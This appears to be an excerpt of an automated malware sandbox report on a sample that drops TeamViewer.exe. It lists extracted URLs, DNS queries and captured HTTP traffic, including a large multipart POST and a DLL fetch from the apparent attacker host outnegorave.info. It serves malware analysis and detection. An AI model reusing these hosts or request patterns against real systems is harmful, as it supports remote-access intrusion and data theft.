Source: svchost.exe, 0000000E.00000002.491168196.000001C4950E3000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.749228779.00000282E9C16000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://go.teamviewer.comn0
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001B
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001J
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001PIx
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001X
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001h
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001p
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001t
Source: TeamViewer.exe, 00000003.00000003.407522755.0000000005766000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001
Source: TeamViewer.exe, 00000003.00000003.412119369.0000000005778000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001o
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172965&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172969&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172973&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000002.754226459.000000000579E000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/din.aspx?s=32172978&client=DynGate&p=10000002
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.412076158.0000000005766000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sT
Source: TeamViewer.exe, 00000003.00000002.754331620.00000000057D9000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7
Source: TeamViewer.exe, 00000003.00000003.412973505.000000000576A000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000003.415730284.000000000576A000.00000004.00000001.sdmpString found in binary or memory: http://master1.teamviewer.com/dout.aspx?s=32172978&p=10000001&client=DynGate&data=FyQS
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=0000000&client=DynGate&rnd=19
Source: TeamViewer.exe, 00000003.00000002.753222429.0000000003A1C000.00000004.00000001.sdmpString found in binary or memory: http://mastr1.teamviewer.com/din.aspx?s=3272978&client=DynGate&p=1000
Source: 77Etc0bR2v.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 77Etc0bR2v.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.comodoca.com0
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
Source: TeamViewer.exe, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.TeamViewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.TeamViewer.com#http://www.TeamViewer.com/licensing
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.TeamViewer.com/download
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.TeamViewer.com/help
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
Source: Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000000.363681783.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000000.390922597.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.460385781.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.475864917.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000002.472094268.0000000000733000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000000.471404886.0000000000733000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/CConnectionHistoryManager::createMessageString():
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/company/index.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/beta.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/
Source: TeamViewer.exe, 00000003.00000002.754192652.0000000005790000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/6
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/8C631A8/
Source: TeamViewer.exe, 00000003.00000002.751027599.0000000000B09000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/70
Source: TeamViewer.exe, 00000003.00000002.754169894.0000000005783000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/87096&p=10000001
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/s
Source: TeamViewer.exe, 00000003.00000002.754128166.0000000005766000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/B8C631A8/x
Source: TeamViewer.exe, 00000003.00000003.551167958.000000000577F000.00000004.00000001.sdmpString found in binary or memory: https://outnegorave.info/allControlPanel.dll
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 0000000E.00000003.463719748.000001C495E03000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.464414339.000001C495983000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, nso5B2F.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 0000000E.00000003.477338422.000001C4959BC000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.477073697.000001C4959A5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
Source: TeamViewer.exe, 00000003.00000002.752423584.0000000002841000.00000004.00000001.sdmp, TeamViewer.exe, 00000003.00000002.751645333.00000000025B0000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: 77Etc0bR2v.exe, 00000001.00000002.368336923.00000000028F4000.00000004.00000001.sdmp, TeamViewer.exe, 00000002.00000001.365920728.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000003.00000001.392801866.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000A.00000002.466646502.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000B.00000002.478867998.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 0000000C.00000001.456353295.0000000010000000.00000002.00020000.sdmp, TeamViewer.exe, 00000010.00000002.485009916.0000000010000000.00000002.00020000.sdmp, Teamviewer_Resource_ja.dll.1.drString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 0000000E.00000003.467072130.000001C495981000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.467089895.000001C495E02000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 87812Content-Type: multipart/form-data; boundary=--------2771230636User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: outnegorave.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exeCode function: 2_2_6F335540 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoA,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master1.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
